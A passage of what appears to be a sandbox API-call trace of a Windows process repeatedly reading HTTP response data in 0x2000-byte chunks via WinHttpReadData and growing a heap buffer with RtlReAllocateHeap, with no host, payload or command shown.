	[0195.390] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x91f00) returned 0x2590020
	[0195.399] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x261ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x261ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.399] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.399] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x93f00) returned 0xdb0020
	[0195.408] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe41f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe41f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.409] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.409] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x95f00) returned 0x2590020
	[0195.419] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2623f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2623f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.419] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.419] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x97f00) returned 0xdb0020
	[0195.428] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe45f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe45f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.429] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.429] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x99f00) returned 0x2590020
	[0195.438] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2627f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2627f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.439] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.439] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x9bf00) returned 0xdb0020
	[0195.448] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe49f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe49f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.449] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.449] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0x9df00) returned 0x2590020
	[0195.460] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x262bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x262bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.460] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.460] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0x9ff00) returned 0xdb0020
	[0195.531] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0xe4df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0xe4df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.531] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.578] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0xdb0020, Size=0xa1f00) returned 0x2590020
	[0195.588] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x262ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x262ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.588] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.588] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xa3f00) returned 0x2c90020
	[0195.599] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d31f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d31f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.599] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.599] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xa5f00) returned 0x2590020
	[0195.609] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2633f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2633f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.610] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.617] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xa7f00) returned 0x2c90020
	[0195.642] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d35f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d35f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.642] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.643] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xa9f00) returned 0x2590020
	[0195.653] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2637f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2637f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.653] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.653] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xabf00) returned 0x2c90020
	[0195.664] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d39f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d39f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.664] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.665] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xadf00) returned 0x2590020
	[0195.676] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x263bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x263bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.676] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.676] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xaff00) returned 0x2c90020
	[0195.687] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d3df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d3df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.687] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.687] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xb1f00) returned 0x2590020
	[0195.698] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x263ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x263ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.698] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.698] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xb3f00) returned 0x2c90020
	[0195.709] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d41f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d41f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.709] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.710] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xb5f00) returned 0x2590020
	[0195.721] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2643f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2643f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.721] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.721] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xb7f00) returned 0x2c90020
	[0195.733] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d45f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d45f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.733] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.765] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xb9f00) returned 0x2590020
	[0195.777] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2647f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2647f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.777] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.812] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xbbf00) returned 0x2c90020
	[0195.823] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d49f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d49f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.823] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.824] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xbdf00) returned 0x2590020
	[0195.835] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x264bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x264bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.835] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.835] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xbff00) returned 0x2c90020
	[0195.847] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d4df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d4df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.847] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.884] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xc1f00) returned 0x2590020
	[0195.896] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x264ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x264ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.897] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.897] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xc3f00) returned 0x2c90020
	[0195.909] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d51f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d51f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.909] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.909] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xc5f00) returned 0x2590020
	[0195.922] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2653f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2653f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.922] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.922] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xc7f00) returned 0x2c90020
	[0195.937] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d55f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d55f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.937] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.937] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xc9f00) returned 0x2590020
	[0195.950] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2657f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2657f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.950] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.950] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xcbf00) returned 0x2c90020
	[0195.962] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d59f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d59f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.963] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.963] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xcdf00) returned 0x2590020
	[0195.976] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x265bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x265bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.976] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.977] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xcff00) returned 0x2c90020
	[0195.989] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d5df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d5df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0195.989] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0195.990] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xd1f00) returned 0x2590020
	[0196.050] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x265ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x265ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.050] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.093] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xd3f00) returned 0x2c90020
	[0196.106] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d61f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d61f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.106] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.106] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xd5f00) returned 0x2590020
	[0196.119] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2663f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2663f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.120] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.120] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xd7f00) returned 0x2c90020
	[0196.134] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d65f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d65f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.134] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.156] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xd9f00) returned 0x2590020
	[0196.176] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2667f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2667f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.176] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.176] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xdbf00) returned 0x2c90020
	[0196.194] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d69f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d69f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.194] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.195] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xddf00) returned 0x2590020
	[0196.208] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x266bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x266bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.208] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.209] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xdff00) returned 0x2c90020
	[0196.222] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d6df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d6df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.222] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.223] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xe1f00) returned 0x2590020
	[0196.237] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x266ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x266ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.237] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.237] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xe3f00) returned 0x2c90020
	[0196.252] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d71f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d71f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.252] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.253] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xe5f00) returned 0x2590020
	[0196.267] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2673f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2673f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.267] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.311] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xe7f00) returned 0x2c90020
	[0196.325] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d75f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d75f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.325] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.373] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xe9f00) returned 0x2590020
	[0196.389] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2677f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2677f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.389] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.389] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xebf00) returned 0x2c90020
	[0196.404] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d79f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d79f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.404] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.404] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xedf00) returned 0x2590020
	[0196.419] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x267bf1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x267bf1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.419] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.431] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xeff00) returned 0x2c90020
	[0196.446] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d7df1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d7df1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.446] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.446] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xf1f00) returned 0x2590020
	[0196.463] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x267ff1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x267ff1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.463] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.464] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2590020, Size=0xf3f00) returned 0x2c90020
	[0196.479] WinHttpReadData (in: hRequest=0x271f00, lpBuffer=0x2d81f1d, dwNumberOfBytesToRead=0x2000, lpdwNumberOfBytesRead=0x12822c | out: lpBuffer=0x2d81f1d*, lpdwNumberOfBytesRead=0x12822c*=0x2000) returned 1
	[0196.479] WinHttpQueryDataAvailable (in: hRequest=0x271f00, lpdwNumberOfBytesAvailable=0x128234 | out: lpdwNumberOfBytesAvailable=0x128234*=0x2000) returned 1
	[0196.479] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2c90020, Size=0xf5f00) returned 0x2590020
